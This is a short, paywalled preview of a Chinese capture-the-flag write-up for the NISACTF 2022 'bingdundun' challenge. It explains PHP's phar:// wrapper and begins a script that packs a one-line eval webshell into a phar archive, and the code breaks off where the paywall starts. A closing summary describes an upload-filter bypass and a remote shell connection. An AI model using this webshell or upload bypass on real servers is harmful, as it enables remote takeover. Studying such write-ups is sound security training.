[NISACTF 2022]bingdundun
由于这题考查的是这题考察的是phar协议
所以先介绍一下
phar:// — PHP 归档
phar://、zip://、bzip2://、zlib://
用于读取压缩文件,zip:// 、 bzip2:// 、 zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。
用法示例
phar:/http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
第一步我们需要构造phar包,下面是代码直接套:
<?php
$payload = '<?php eval($_POST["shell"]); ?>' ;//一句话木马
$phar = new
利用phar协议在NISACTF2022中实现冰墩墩漏洞利用

文章讲述了在NISACTF2022网络安全挑战赛中,如何利用phar协议构造PHP归档文件,绕过只允许上传图片或压缩包的限制,通过MIME类型绕过,植入并执行一句话木马。过程中遇到了phar.readonly的配置问题,通过命令行解决了。最终成功上传并执行了木马,通过蚁剑连接获取了flag。
最低0.47元/天 解锁文章
1121





